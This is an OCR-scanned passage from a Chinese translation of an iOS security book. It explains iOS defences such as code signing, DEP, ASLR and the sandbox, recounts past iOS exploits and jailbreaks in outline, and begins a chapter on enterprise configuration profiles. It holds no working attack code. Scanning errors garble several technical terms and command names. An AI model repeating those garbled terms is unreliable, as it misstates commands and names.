除了 减少 可 能 被 攻击 者 利用 的 代码 , 苹果 公司 还 精简 掉 了 若干 应 用 , 以 防 为 攻击 者 在 进行 漏 
洞 攻击 时 和 得 手 之 后 提供 便利 。 最 明显 的 例子 就 是 iOS 设 备 上 没有 shell ( /bin/sh )。 在 针对 Mac 
OS X 的 漏洞 攻击 中 ， 攻 击 者 的 主要 目标 就 是 试 着 在 “shellcode” 中 执行 shell。 而 iOS 中 根本 没有 
shell, 所 以 针对 ioOS 的 漏洞 攻击 就 必须 寻求 其 他 最 终 目 标 。 不过, 即便 iOS 中 有 shell 他 们 也 用 不 上 ， 
因为 攻击 者 没 法 从 shell 执 行 诸 如 zm、1s、ps 这 样 的 实用 程序 。 企 图 运行 代码 的 攻击 者 要 么 在 被 
攻击 进程 的 上 下 文中 作案 ， 要 么 只 能 自 备 所 有 工具 。 不 管 怎样 ， 都 没 那么 容易 。 






































1.4.3 ”权限 分 离 


iOS 使 用 用 户 、 组 和 其 他 传统 UNIX 文 件 权 限 机 制 分 离 了 各 进程 。 例 如 ,用户 可 以 直接 访问 的 
很 多 应 用 ， 比 如 Web 浏 览 器 、 邮 件 客户 端 或 第 三 方 应 用 ， 就 是 以 用 户 mobile 的 身份 运行 的 。 而 
多 数 重 要 的 系统 进程 则 是 以 特权 用 户 z*oet 的 身份 运行 的 。 其 他 系统 进程 则 以 诸如 _wireless 和 
_mdnsresponder 这 样 的 用 户 运行 。 利 用 这 一 模型 ， 那 些 完 全 控制 了 Web 浏 览 需 这 类 进程 的 攻击 
者 执行 的 代码 会 被 限制 为 以 用 户 mobile 的 身份 运行 。 这 样 的 漏洞 攻击 所 能 产生 的 影响 就 比较 有 
限 了 ， 比 如 没 办 法 进行 系统 级 别 的 配置 更 改 。 同 样 , 来自 App Store 的 应 用 其 行为 会 受到 限制 ， 
为 它们 也 是 以 用 户 mobile 的 身份 执行 的 。 






































1.4.4 代码 签名 


iOS 中 最 重要 的 安全 机 制 是 代码 签名 。 所 有 的 二 进 制 文件 (binary ) 和 类 库 在 被 内 核 允 许 执行 
之 前 都 必须 经 过 受信 任 机构 ( 比如 苹果 公司 ) 的 签名 。 此 外 ,内 存 中 只 有 那些 来 自己 签名 来 源 的 
页 才 会 被 执行 。 这 意味 着 应 用 无 法 动态 地 改变 行为 或 完成 自身 升级 。 这样 做 都 是 为 了 防止 用 户 从 
因特网 上 下 载 和 执行 随机 的 文件 。 所 有 的 应 用 都 必须 从 苹果 的 App Store 下 载 ( 除非 对 设备 进行 配 
置 ， 使 其 接受 其 他 的 源 )。 苹 果 公 司 拥有 最 终审 批 权 ， 在 检查 过 应 用 之 后 才 允 许 其 在 App Store 中 
供用 户 下 载 。 这 样 一 来 ， 苹 果 公 司 就 起 到 了 为 :OS 设备 杀毒 的 作用 。 它 会 审查 每 个 应 用 ， 确 定 其 
能 和 否 在 iOS 设 备 上 运行 。 这 种 保护 使 得 iOS 设 备 很 难受 到 恶意 软件 的 影响 。 事 实 上 ，iOS 中 出 现 的 
恶意 软件 屈指 可 数 。 

代码 签名 的 另 一 影响 在 于 让 漏洞 攻击 变 复杂 了 。 漏洞 攻击 如 果 要 在 内 存 中 执行 代码 , 可 能 就 
要 下 载 、 安 装 并 执行 其 他 的 恶意 应 用 。 而 因为 它 要 安装 的 内 容 都 是 未 签名 的 ， 所 以 系统 会 拒绝 安 
装 。 因 此 ， 漏 洞 攻击 会 被 限制 在 它们 最 初 利用 的 那个 进程 中 ， 除 非 它 继续 攻击 设备 的 其 他 功能 。 

当然 , 这 个 代码 签名 保护 机 制 也 是 用 户 想 要 越狱 的 原因 。 一旦 将 设备 越狱 , 未 签名 的 应 用 就 
可 以 在 越狱 过 的 设备 上 安装 运行 。 越 狱 还 会 破坏 其 他 保护 机 制 ( 稍 后 再 介绍 )。 
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1.4.5 数据 执行 保护 


一 般 而 言 ，DEP (Data Execution Prevention ， 数 据 执行 保护 ) 是 这 样 一 种 机 制 : 处 理 需 能 区 
分 哪 部 分 内 存 是 可 执行 代码 以 及 哪 部 分 内 存 是 数据 。DEP 不 允许 数据 的 执行 ， 只 允许 代码 执行 。 
这 一 点 非常 重要 , 因为 当 漏 洞 攻击 试 网 运行 有 效 载 荷 时 , 它 会 将 有 效 载 和 荷 注入 进程 并 执行 该 有 效 
载荷 。DEP 会 让 这 种 攻击 行 不 通 ， 因 为 有 效 载 符 会 被 识别 为 数据 而 非 代码 。 攻 击 者 通常 会 试图 利 
用 第 8 章 介 绍 的 ROP (Return-Oriented Progr amming， 面 向 返回 的 程序 设计 ) 技术 绕 过 DEP。 在 
ROP 过 程 中 ,攻击 者 通常 会 用 一 种 进程 意料 之 外 的 方式 重用 已 经 存在 的 有 效 代码 段 ， 以 执行 预 
期 行动 。 

iOS 中 代码 签名 机 制 的 作用 原理 与 DEP 相 似 ， 甚 至 要 更 强大 。 针 对 启用 DEP 的 系统 的 一 般 攻 
击 只 是 利用 ROP 创 建 一 块 可 写 入 且 可 执行 的 内 存 区 域 (这样 DEP 就 不 会 执行 )。 然 后 ， 它 就 可 以 
在 该 区 域 中 写 人 有 效 载荷 并 执行 该 有 效 载荷 。 不 过 , 代码 签名 要 求 ， 除 非 页 源 自 受信 任 机 构 签 名 
过 的 代码 ， 否 则 该 页 就 不 会 被 执行 。 因 此 ， 在 iO0S 中 进行 ROP 时 ， 攻 击 者 不 可 能 像 往常 那样 关闭 
DEP。 联 系 到 漏洞 攻击 没 法 执行 它们 写 入 磁盘 的 应 用 这 一 事实 ， 这 就 意味 着 漏洞 攻击 只 能 执行 
ROP。 它 们 可 能 没 法 执行 其 他 类 型 的 有 效 载荷 ， 比 如 shellcode 或 其 他 二 进 制 文件 。 在 ROP 中 写 人 
大 的 有 效 载荷 非常 耗 时 也 非常 复杂 。 这 使 得 对 iOS 进 行 漏洞 攻击 要 比 针 对 其 他 任何 平台 的 漏洞 攻 
击 都 难 。 






















































































1.4.6 ”地 址 空间 布局 随机 化 


正如 1.4.5 节 中 讨论 的 ， 攻击 者 绕 过 DEP 的 方式 是 重用 已 存在 的 代码 段 (ROP )。 不过， 要 做 
到 这 一 点 ， 他 们 需要 搞 清楚 想 要 重用 的 代码 段位 于 何 处 。 通 过 让 对 象 在 内 存 中 的 位 置 随机 化 ， 
ASLR(Address Space Layout Randomization, 地址 空间 布局 随机 化 ) 使 做 到 这 一 点 变 得 非常 困难 。 
在 iOS 中 ， 二 进 制 文件 、 库 文件 、 动 态 链接 文件 、 栈 和 堆 内 存 地 址 的 位 置 全 部 是 随机 的 。 当 系统 
同时 具有 DEP 和 ASLR 机 制 时 ， 针 对 该 系统 编写 漏洞 攻击 代码 的 一 般 方 法 就 完全 无 效 了 。 在 实际 
应 用 中 , 这 通常 意味 着 攻击 者 需要 两 个 漏洞 ， 一 个 用 来 获取 代码 执行 权 , 另 一 个 用 来 获取 内 存 地 
址 以 执行 ROP， 不 然 攻击 者 就 需要 一 个 极其 特殊 的 漏洞 来 做 到 这 两 点 。 



























































1.4.7 ” 沙 盒 


iOS 防 御 机 制 的 最 后 一 环 是 沙 盒 。 与 之 前 提 到 的 UNIX 权 限 系统 相 比 ,， 沙 盒 可 以 对 进程 可 执行 
的 行动 提供 更 细 粒 度 的 控制 。 例 如 ，SMS 应 用 和 Web 浏 览 器 都 是 以 用 户 mobile 的 身份 运行 的 ， 
但 它们 执行 的 动作 差别 很 大 。SMS 应 用 可 能 不 需要 访问 Web 浏 览 器 的 cookie， 而 Web 浏 览 咒 不 需 
要 访问 短信 。 而 来 自 App Store 的 第 三 方 应 用 不 应 该 具有 cookie 和 短信 的 访问 权 。 通 过 让 苹果 公司 
指定 应 用 具体 需要 那些 权限 ， 沙 盒 机 制 解决 了 这 一 问题 ( 参见 第 5 章 )。 

沙 盒 有 两 个 效果 。 首 先 , 它 限 制 了 恶意 软件 对 设备 造成 的 破坏 。 想 象 一 下 ， 就 算 恶 意 软件 侥 
幸 通 过 了 App Store 的 审查 流程 ， 被 下 载 到 设备 上 并 开始 执行 ， 该 应 用 还 是 会 被 沙 盒 规则 所 限制 。 
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它 可 能 会 窃取 设备 上 所 有 的 照片 和 地 址 德 信息 , 但 它 没 办 法 执行 发 短信 或 打 电话 等 会 直接 使 用 话 | 
费 的 操作 。 沙 盒 还 让 漏洞 攻击 变 得 更 困难 。 就 算 攻击 者 在 减 小 的 受 攻击 面 上 找到 了 漏洞 ,并 绕 过 

ASLR 和 DEP 执 行 了 代码 ， 有 效 载荷 也 还 是 会 被 限制 在 沙 盒 里 可 访问 的 内 容 中 。 总 而 言 之 ， 所 有 

这 些 保护 机 制 虽然 不 能 说 会 完全 杜绝 恶意 软件 和 漏洞 攻击 ， 但 也 大 大 加 大 了 攻击 的 难度 。 














1.5 iOS 攻击 简 史 


在 对 iOS 设 备 的 防御 能 力 有 了 基本 的 了 解 后 , 我 们 来 看 一 些 针 对 iOS 设 备 的 成 功 攻击 , 看 看 现 
实 中 设备 的 安全 防线 是 如 何 被 突破 的 。 这 个 简 史 也 展示 了 设备 的 安全 性 是 如 何 演化 以 应 对 各 种 攻 
击 的 。 








1.5.1 Libtiff 


在 第 一 代 iPhone 于 2007 年 问世 时 ， 消 费 者 们 为 购买 它 排 起 了 长 队 。 可 能 是 为 了 尽快 上 市 ， 
第 一 代 iPhone 的 安全 状况 并 不 太 好 。 大 家 已 经 看 到 了 iOS 5 的 情况 ， 而 第 一 代 iPhone 所 使 用 的 
“iOS 1” 呢 : 
口 有 着 更 小 的 受 攻击 面 ; 
口 有 着 精简 的 操作 系统 ; 
口 没有 权限 分 离 ， 所 有 进程 都 以 zoot 权 限 运 行 ; 
口 没有 强制 的 代码 签名 机 制 ; 
口 没有 DEP; 
口 没有 ASLR; 
口 没有 沙 盒 机 制 。 
因此 ， 如 果 在 设备 上 发 现 了 漏洞 ,攻击 者 就 很 容易 利用 这 些 漏洞 。 黑 客 在 进行 漏洞 攻击 时 可 
以 自由 运行 shellcode， 或 是 下 载 并 执行 文件 。 而 寻找 漏洞 也 是 相当 简单 的 ， 因 为 第 一 代 iPhone 的 
软件 在 发 售 时 就 有 很 多 已 知 的 瑕 辛 。 任 何 攻 击 都 能 让 黑客 立即 获得 coot 权 限 。 

Tavis Ormandy 最 先 指出 用 来 处 理 TIFF 图 像 文件 的 某 版 Libtift 存 在 漏洞 ， 而 Chris Wade 则 针对 
这 一 漏洞 编写 出 了 可 用 的 漏洞 攻击 代码 。 这 让 用 户 有 可 能 打开 恶意 网 站 ,从 而 让 这 些 网 站 获得 对 
其 设备 的 远程 root 访 问 权 。 该 漏洞 是 在 iPhone OS 1.1.2 中 被 修复 的 。 

彼 时 Libtiff 漏 洞 攻击 是 可 行 的 ， 而 现在 如 果 在 Libtiff 库 中 找到 类 似 的 漏洞 又 会 怎样 呢 ? 最 初 
的 漏洞 攻击 会 在 堆 内 存 中 写 入 可 执行 代码 ， 并 让 设备 执行 这 些 代码 。 不 过 ， 因 为 DEP 的 出 现 ， 这 
样 做 现在 已 经 行 不 通 了 。 因 此 ， 现 在 的 漏洞 攻击 必须 用 到 ROP， 并 用 某 种 方式 击溃 ASLR 机 制 。 
这 可 能 需要 另外 的 漏洞 。 此 外 ， 即 便 攻击 者 成 功 进行 了 漏洞 攻击 ， 他 也 只 会 获得 mobile 用 户 权 
限 ， 受 到 沙 盒 的 限制 。 这 与 之 前 获得 不 受 限 制 的 root 访 问 权 有 着 天 坏 之 别 。 

尽管 这 里 讲 的 是 iOS 1， 但 我 们 还 是 要 指出 ， 亚 意 软件 对 于 iOS 1 来 说 并 不 是 什么 大 问题 。 
为 第 一 代 iPhone 没 有 官方 途径 下 载 第 三 方 应 用 ， 这 种 途径 直到 iOS 2 才 出 现 。 
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1.5.2 ”短信 攻击 


2009 年 ， 研 究 人 员 Collin Mulliner 和 Charlie Miller 发 现 了 iPhone 短信 和 解析 方式 中 存在 的 漏洞 。 
那 时 候 人 们 使 用 的 还 是 iOS 2。 除了 ASLR，iOS 2 几乎 具有 iOS 5 所 具备 的 所 有 安全 机 制 。 问 题 在 
于 , 尽管 大 多 数 进 程 都 是 以 受 沙 盒 限 制 的 非特 权 用 户 身份 运行 的 , 但 处 理 短信 的 进程 却 不 是 。 而 
相关 的 CommCenter 程 序 正好 又 是 以 不 受 沙 盒 限制 的 root 权 限 运 行 的 。 

没有 实现 ASLR 有 一 个 问题 : DEP 只 有 在 配合 ASLR 的 时 候 才 能 真正 起 作用 。 也 就 是 说 ， 
如 果 内 存 没 有 随机 化 ， 攻 击 者 就 能 确切 知道 所 有 可 执行 代码 的 存放 位 置 ， 执 行 ROP 就 会 相当 
简单 。 

除了 是 一 种 进入 系统 的 强大 方式 ， 还 有 其 他 原因 让 短信 应 用 成 为 一 条 主要 攻击 途径 。 其 一 是 
不 需要 用 户 交 互 。 攻 击 者 不 需要 引导 受害 者 访问 某 个 恶意 网 站 ， 而 只 要 知道 受害 者 的 电话 号 码 并 
发 送 攻击 短信 即 可 。 其 二 是 受害 者 没 办 法 防止 此 类 攻击 ， 因 为 通常 状态 下 不 可 能 禁用 记 hone 的 短 
信 功 能 。 其 三 ， 这 是 一 种 静默 攻击 ， 即 便 在 设备 关机 的 情况 下 也 是 可 以 进行 的 。 如 果 攻 击 者 在 设 
备 关机 的 情况 下 发 送 了 恶意 短信 ， 运 营 商 会 存储 这 些 信息 ， 并 在 设备 开机 后 第 一 时 间 将 信息 传送 
到 设备 上 。 

这 一 漏洞 在 iOS 3.0.1 中 得 到 了 修复 。 现 在 ， 这 样 的 攻击 变 得 更 困难 了 ， 不 仅 因为 这 样 的 漏 
洞 攻击 要 面 对 ASLR, 还 因为 现在 的 CommCenter 进 程 是 以 _wireless 用 户 权 限 而 非 vcoot 权 限 运 
行 的 。 


































































































1.5.3 ”|Ikee 蠕 虫 


到 iOS 2 问世 时 ，iPhone 已 经 相当 成 熟 了 。 不 过 ,将 iPhone 越狱 还 是 会 破坏 设备 的 整体 安全 架 
构 。 当 然 ， 越 狱 禁 用 了 代码 签名 机 制 ， 不 过 它 所 做 的 远 不 只 此 : 允许 安装 软件 ( 关键 还 是 因为 运 
行 了 未 签名 代码 ) 扩大 了 受 攻击 面 ， 为 设备 增加 了 系统 实用 程序 ( 比如 shell )， 人 允许 安装 以 root 
用 户 权限 运行 的 应 用 。 而 关闭 了 代码 签名 机 制 ， 也 就 关 掉 了 强 有 力 的 DEP。 也 就 是 说 ，ROP 有 效 
载荷 可 以 禁用 DEP， 并 在 越狱 过 的 设备 上 写 人 和 执行 shellcode。 最 后 ， 新 的 未 签名 应 用 是 不 受 沙 
盒 限 制 的 。 因 此 ， 越 狱 基 本 上 会 关闭 记 hone 的 所 有 安全 机 制 ， 而 不 只 是 代码 签名 。 

因此 ， 越 狱 过 的 iPhone 会 成 为 漏洞 攻击 的 目标 也 就 不 足 为 奇 了 。Ikee 晴 虫 ( 又 名 Dutch 
ransom 、iPhone/Privacy.A 或 Duh/Ikee.B ) 就 利用 了 很 多 用 户 为 Phone 越狱 后 安装 了 SSH 服 务 需 
却 没有 修改 默认 root 密 码 这 一 事实 。 这 意味 着 任何 连接 到 这 种 设备 的 人 都 能 用 root 权 限 远 程控 
制 这 些 设 备 。 有 了 这 些 条 件 ， 编 写 蠕虫 就 不 是 什么 难事 了 。 除 此 之 外 ，SSH 服 务 器 也 是 不 受 沙 
盒 限 制 的 。 

Ikee 蠕 虫 在 其 生命 期 的 不 同 阶段 会 做 各 种 不 同 的 事情 。 起 初 ， 它 只 是 修改 设备 的 壁纸 ( 参见 
图 1-2 )。 后 来 ， 它 改 为 执行 多 种 恶意 行为 ， 比 如 锁定 Phone 向 用 户 勒 索 赎 金 ， 窃 取 让 hone 中 的 内 
容 ， 甚 至 让 受 影响 的 设备 成 为 僵尸 网 络 的 一 部 分 。 

显然 ， 如 果 用 户 不 把 他 们 的 设备 越狱 ， 这 一 切 都 不 会 发 生 。 
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图 1-2 Rick Astley 永 不 抛弃 你 


图 片 来 源 : F-Secure 的 Mikko Hypponen。 


1.5.4 Storm8 

2009 年 ， 由 知名 开发 商 Storm8 开 发 的 游戏 收集 了 运行 这 些 游戏 的 手机 上 存储 的 电话 号 码 , 然 
后 将 这 些 信息 发 送 到 Storm8 的 服务 器 上。 受到 影响 的 应 用 包括 Vampires Live 、Zombies Live 和 
Rockstars Live ( 参见 图 1-3 ) 等 。 有 人 对 Storm8 提 起 了 集体 诉讼 ， 指 控 该 应 用 的 数据 收集 功能 是 
人 为 过 失 。 而 在 这 段 时 间 里 Storm8 的 应 用 有 约 两 千 万 的 下 载 量 。 








1-3 ”Vampires Live 不 只 为 iOS 带 来 了 狂暴 的 吸血 鬼 





图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 





10 第 1 章 ”iOS 安全 基础 知识 





1.5.5 SpyPhone 


SpyPhone 是 Seriot Nicolas 编 写 的 概念 验证 应 用 ， 验 证 了 针对 第 三 方 应 用 的 iOS 沙 盒 限 制 。 该 
应 用 尝试 过 访问 所 有 可 以 想象 的 信息 ， 并 试 着 执行 了 沙 盒 所 人 允许 的 任意 行为 。 针 对 iOS 沙 盒 有 一 
件 事 要 注意 , 就 是 来 自 App Store 的 所 有 第 三 方 应 用 都 有 着 相同 的 沙 盒 规 则 。 这 意味 着 ， 如果 苹果 
公司 认为 某 一 应 用 应 该 具有 某 些 权限 , 那么 所 有 的 应 用 都 肯定 要 具有 该 权限 。 这 与 安 卓 系统 的 沙 
盒 机 制 不 同 ， 不 同 的 安 齐 应 用 可 以 具有 根据 其 需求 指定 的 不 同 权限 。iOS 这 种 模式 的 弱点 在 于 太 
过 宽松 。 例 如 ， 通 过 以 完全 合法 的 方式 使 用 公共 API ( 尽管 应 用 事实 上 还 是 受 沙 盒 的 限制 )， 
SpyPhone 可 以 访问 以 下 数据 : 
口 手机 号 码 ; 
口 对 地 址 短 的 读 / 写 访问 ; 
口 Safari/YouTube 搜 索 关 键 词 ; 
口 电子 邮箱 账户 信息 ; 
口 键盘 缓存 ; 
口 标记 有 地 理 信 息 的 照片 ; 
DGPS 信 息 ; 
口 WiFi 接 入 点 名 称 。 
这 一 应 用 表明 ， 即 便 在 沙 盒 内 ， 恶 意 程 序 还 是 能 从 受 影响 的 设备 上 提取 到 数量 惊人 的 信息 。 
























































1.5.6 Pwn2Own 2010 


本 书 的 两 位 作者 Vincenzo Iozzo 和 Ralf-Philipp Weinmann 廊 得 过 2010 年 针对 iPhone 3GS 的 
Pwn2Own 黑 客 竞赛 。 他 们 在 MobileSafari 中 找到 了 让 他 们 可 以 远程 执行 代码 的 漏洞 。 该 漏洞 存在 
于 未 使 用 ASLR 的 iOS 3 中 。 由 于 使 用 了 代码 签名 机 制 ，iPhone 3GS 的 整个 有 效 载 荷 都 被 写 人 ROP 
中 。 利 用 ROP，Iozzo 和 Weinmann 可 以 打开 存放 着 所 有 短信 的 SMS 数 据 库 ， 并 将 这 些 短信 发 送 到 
他 们 控制 的 远程 服务 器 上 。 但 他 们 受到 了 mobile 用 户 权 限 和 MobileSafari 沙 盒 的 限制 。 要 进行 更 
多 的 破坏 还 要 多 费 点 工夫 。 他 们 的 努力 为 他 们 赢得 了 15 000 美 元 和 一 部 iPhone。2011 年 这 项 赛事 
的 大 奖 则 是 被 本 书 的 另 两 位 作者 拿 走 的 。 














1.5.7 Jailbreakme.com 2 (“Star”) 


我 们 介绍 了 iOS 5 为 限制 远程 攻击 者 所 采取 的 各 种 措施 。 这 让 攻击 变 得 异常 艰难 ,但 并 非 不 
可 能 。2010 年 8 月 ，comex" 那 扯 名 昭著 的 jailbreakme.com 网 站 就 展示 了 这 样 的 攻击 。( 第 一 版 的 
jailbreakme.com 针 对 的 是 第 一 代 iPhone， 所 以 相对 简单 。) 第 二 版 的 jailbreakme.com 网 站 可 以 执行 
一 系列 行为 ， 并 最 终 让 访问 该 网 站 的 iOS 设 备 越 狄 。 这 意味 着 它 肯 定 像 :OS 1.0 时 代 那 样 获得 了 远 
程 root 访 问 权 。 不 过 ,jailbreakme.com 2 针对 的 是 iOS 4.0.1， 这 一 系统 包含 了 除 ASLR 之 外 的 所 有 


























GD comex 是 人 研究 :OS 设备 越狱 的 著名 黑客 Nicholas Allegra 的 网 名 。 一 一 译 者 注 
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安全 机 制 (这 一 版 本 的 iOS 中 尚未 添加 该 机 制 )。 那 么 它 是 如 何 起 作用 的 呢 ? 首先 ， 它 利用 了 
MobileSafari 处 理 特殊 字体 时 产生 的 栈 洪 出 ， 这 使 得 漏洞 攻击 代码 可 以 在 MobileSafari 中 启动 它 的 
ROP 有 效 载荷 。 接着, 这 一 复杂 的 有 效 载 答 不 是 要 搬 走 SMS 数 据 库 ， 而 是 继续 利用 男 一 个 漏洞 提 
升 对 设备 的 访问 权 。 这 第 二 个 漏洞 是 IOKit 的 Tosurface 属 性 中 存在 的 整数 溢出 漏洞 。 这 里 提 到 
的 第 二 次 攻击 让 攻击 者 可 以 在 内 核 中 执行 代码 。 这 样 攻击 者 就 可 以 从 内 核 中 禁用 代码 签名 机 制 ， 
然后 该 ROP 会 下 载 用 来 为 Phone 越狱 的 未 签名 动态 库 并 加 载 该 动态 库 。 苹 果 公 司 很 快 修复 了 该 漏 
洞 ， 因 为 尽管 jailbreakme.com 网 站 只 是 用 来 为 手机 越狱 ， 但 它 很 容易 改 为 对 访问 它 的 设备 执行 任 
何 想 执行 的 操作 。 





























1.5.8 Jailbreakme.com 3 (“Saffron” ) 


目前 为 止 介绍 过 的 所 有 例子 都 有 个 共同 之 处 ， 那 就 是 它们 都 是 针对 iOS 4.3 之 前 的 OS。 而 
ASLR 机 制 正 是 在 iOS 4.3 中 引入 的 。 一旦 加 上 这 最 后 一 道 屏障 , 攻击 者 要 对 iOS 设 备 进行 漏洞 攻击 
可 能 就 特别 困难 了 ? 好 吧 ，comex 用 最 高 能 对 付 iOS 4.3.3 的 jailbreakme.com 3 再 次 说 明 这 不 是 问 
题 。 这 一 版 的 jailbreakme 还 是 需要 进行 两 次 漏洞 攻击 ， 一 次 获得 代码 执行 权 ， 另 一 次 禁用 代码 签 
名 机 制 。 那 么 ASLR 要 怎么 处 理 呢 ? 大 家 将 会 在 第 8 章 中 了 解 更 多 与 这 一 漏洞 攻击 有 关 的 内 容 , 不 
过 现在 只 要 知道 被 利用 的 特定 漏洞 可 以 让 攻击 者 读 写 内 存 就 够 了 。 这 样 一 来 , 攻击 者 就 有 可 能 通 
过 读 取 某 些 邻近 指针 的 值 找到 代码 在 内 存 中 的 位 置 , 接着 就 可 以 通过 写 内 存 来 影响 内 存 并 取得 进 
程 的 控制 权 。 正 如 之 前 说 过 的 ， 战 胜 ASLR 一 般 而 言 要 么 需要 两 个 漏洞 ， 要 么 需要 一 个 真正 特殊 
的 漏洞 。 这 个 案例 就 利用 了 一 个 特别 强大 的 漏洞 。 



































1.6 小结 


本 章 首 先 介 绍 了 iOS 设 备 ， 包 括 其 硬件 ， 以 及 它们 自问 世 起 发 生 了 怎样 的 改变 。 然 后 我 们 了 
解 了 与 安全 相关 的 一 些 基本 信息 ， 包 括 iOS 设 备 面 临 哪些 类 型 的 威胁 。 接 着 本 章 从 宏观 上 介绍 了 
本 书 涉及 的 很 多 概念 ， 讨 论 了 iOS 的 安全 设计 ， 其 中 很 多 安全 层 都 会 在 随后 的 内 容 中 用 专门 的 一 
草 详 细 介 绍 。 最 后 ， 本 章 简 述 了 过 去 针对 iOS 成 功 进行 的 攻击 ， 其 至 还 有 可 以 绕 过 iOS 5 的 所 有 安 
全 机 制 的 攻击 。 
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企业 中 的 iOS 








随 着 iOS 设 备 的 不 断 普及 ， 越 来 越 多 的 企业 开始 让 员工 通过 这 些 设备 访问 和 存储 企业 数据 。 
通常 , 企业 会 购买 并 完全 掌控 这 些 可 能 要 用 于 访问 企业 敏感 数据 的 智能 手机 或 其 他 设备 。 在 某 些 
(也 是 越 来 越 常见 的 ) 情况 下 ， 企业 可 能 允许 员工 利用 私人 的 设备 访问 企业 数据 。 不 管 是 哪 种 情 
况 ， 企 业 都 要 权衡 允许 利用 这 些 移动 设备 访问 企业 数据 所 带 来 的 好 处 与 安全 风险 。 

任何 移动 设备 都 可 能 被 放 错 地 方 、 遗 失 或 盗窃 。 如 果 该 设备 存储 着 (或 是 能 访问 ) 敏感 的 企 
业 数 据 ， 就 会 带 来 数据 泄密 的 风险 。 为 此 , 通过 强 密码 限制 对 设备 的 访问 ， 以 及 在 设备 丢失 时 远 
程 锁定 设备 或 清除 设备 上 的 数据 就 显得 很 重要 了 。 本 章 介 绍 如 何 利用 苹果 公司 开发 的 Phone 
Configuration Utility (iPhone 配置 实用 工具 ) 和 Lion Server Profile Manager ( 描述 文件 管理 器 ) 为 
iOS 设 备 创建 和 应 用 配置 描述 文件 ,这些 描述 文件 可 用 来 确保 这 些 设备 严格 执行 组 织 的 安全 政策 ， 
例如 要 求 添加 强 密码 。 作 为 一 种 MDM ( Mobile Device Management，, 移动 设备 管理 ) 服务 ,描述 
文件 管理 器 也 可 用 于 远程 锁定 或 擦 除 遗 失 的 设备 。 
































2.1 iOS 配置 管理 


, > 


基于 iOS 的 设备 可 以 通过 创建 和 安装 配置 描述 文件 (configuration profile ) 进行 管理 。 描 述 文 
件 包含 管理 员 对 用 户 设备 上 安装 的 系统 的 设置 。 这 些 设 置 大 多 数 与 OS 的 “设置 ”( Settings ) 应 
用 中 的 配置 选项 对 应 , 不 过 某 些 设置 只 能 通过 配置 描述 文件 设置 ,而 某 些 则 只 能 在 iOS 的 “设置 ” 
应 用 中 配置 。 只 有 那些 只 能 在 配置 描述 文件 中 进行 配置 的 设置 才 是 可 集中 管理 的 。 

创建 和 管理 配置 描述 文件 最 简单 的 方法 就 是 使 用 苹果 公司 推出 的 Mac 或 Windows 版 Phone 
Configuration Utility。 这 一 图 形 化 实用 工具 让 管理 员 可 以 创建 和 管理 配置 描述 文件 。 这 些 描 述 文 
件 可 以 通过 USB 连 接 安 装 到 iOS 设 备 上 、 以 附件 形式 用 电子 邮件 发 送 给 设备 持 有 人 ， 或 是 直接 放 
在 Web 服 务 顺 上 。 

如 果 要 管理 更 多 设备 ， 企 业 就 应 该 使 用 MDM 系 统 。 苹 果 公 司 在 Lion Server 中 以 描述 文件 管 
理 顺 服务 的 形式 提供 了 这 样 的 系统 。 该 服务 对 于 工作 组 与 中 小 型 组 织 而 言 都 很 适用 。 不 过 ， 对 于 
更 大 的 企业 来 说 ， 第 三 方 的 商业 MDM 解 决 方案 可 能 才 是 最 好 的 。 

本 节 将 介绍 配置 描述 文件 的 基础 知识 ， 并 描述 如 何 利用 iPhone 配置 实用 工具 和 Lion Server 描 
述 文件 管理 需 创 建 和 安装 简单 的 配置 描述 文件 。 
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2.1.1 移动 配置 描述 文件 


配置 描述 文件 是 一 个 XML 属性 列表 (propertylist， 以 下 简称 plist ) 文件 ， 文 件 中 的 数据 值 是 
以 Base64 编 码 形式 存储 的 。 我 们 也 可 以 选择 为 plist 数 据 签名 和 加 密 ， 这 种 情况 下 ， 配 置 描述 文件 
是 依据 RFC 3852 CMS (Cryptographic Message Syntax， 加 密 消息 语法 ) 构成 的 。 因 为 配置 描述 文 
件 中 可 能 包含 用 户 密码 和 Wi-Fi 网 络 密码 等 敏感 信息 ， 所 以 如 果 要 通过 网 络 发 送 这 种 描述 文件 就 
应 该 加 密 。MDM 服 务 器 能 自动 完成 这 些 工作 ,因此 任何 需要 管理 :OS 设备 的 企业 都 最 好 使 用 MDM 
系统 。 

配置 描述 文件 是 由 一 些 基本 的 元 数据 与 配置 有 效 载荷 组 成 的 。 配 置 描述 文件 的 元 数据 包含 人 
类 可 理解 的 名 称 、 描 述 、 创 建 该 描述 文件 的 组 织 ， 以 及 一 些 只 在 后 台 使 用 的 其 他 字段 。 配 置 有 效 
载荷 则 是 描述 文件 最 重要 的 部 分 ， 因 为 对 应 该 描述 文件 的 配置 选项 是 靠 它们 实现 的 。iOS 5 中 可 
用 的 配置 有 效 载 荷 详 见 表 2-1。 



































表 2-1 配置 描述 文件 的 有 效 载荷 类 型 


















































































































































































































































有 效 载 荷 描 述 

移 除 密码 此 定 用 户 从 设备 移 除 锁定 的 描述 文件 时 必须 输入 的 密码 

密码 策略 定义 用 户 在 解锁 设备 时 是 否 需 要 输入 密码 ， 以 及 该 密码 必须 有 多 复杂 

电子 邮件 配置 用 户 的 电子 邮件 账户 

Web Clip 在 用 户 的 待机 屏幕 上 放置 Web Clip 

限制 限制 使 用 设备 的 用 户 执行 某 些 行动 ， 比 如 使 用 摄像 头 、iTunes App Store 、Siri 、YouTube、 

Safari 等 

LDAP 配置 LDAP 服 务 器 以 供 使 用 

CalDAV 使 用 CalDAV 对 用 户 的 网 络 日 历 账 户 进行 配置 

日 历 订阅 为 用 户 订阅 共享 的 CalDAV 日 历 

SCEP 将 设备 与 简单 证 书 注册 协议 ( Simple Certificate Enrollment Protocol ) 服务 器 关联 起 来 
APN 将 具有 移动 通信 基带 的 iOS 设 备 ( iPhone 或 iPad ) 配置 成 使 用 某 一 特定 的 移动 运营 商 
Exchange 配置 用 户 的 Microsoft Exchange 电 子 邮 件 账 户 

VPN 为 设备 指定 所 要 使 用 的 VPN ( Virtual Private Network， 虚 拟 专用 网 络 ) 配置 

Wi-Fi 将 设备 配置 成 使 用 指定 的 802.11 网 络 

















一 种 有 效 载荷 都 含有 一 组 定义 了 所 文 持 配置 设置 的 属性 列表 键 和 值 。 在 苹果 公司 的 iOS 
Developer Library ( 开发 者 文库 ) 中 ，iOS Configuration Profile Reference ( 配置 描述 文件 参考 ) 
部 分 详细 列 出 了 各 种 有 效 载荷 包含 的 键 以 及 可 使 用 的 键 值 。 虽 然 我 们 可 以 根据 该 规范 手工 创建 
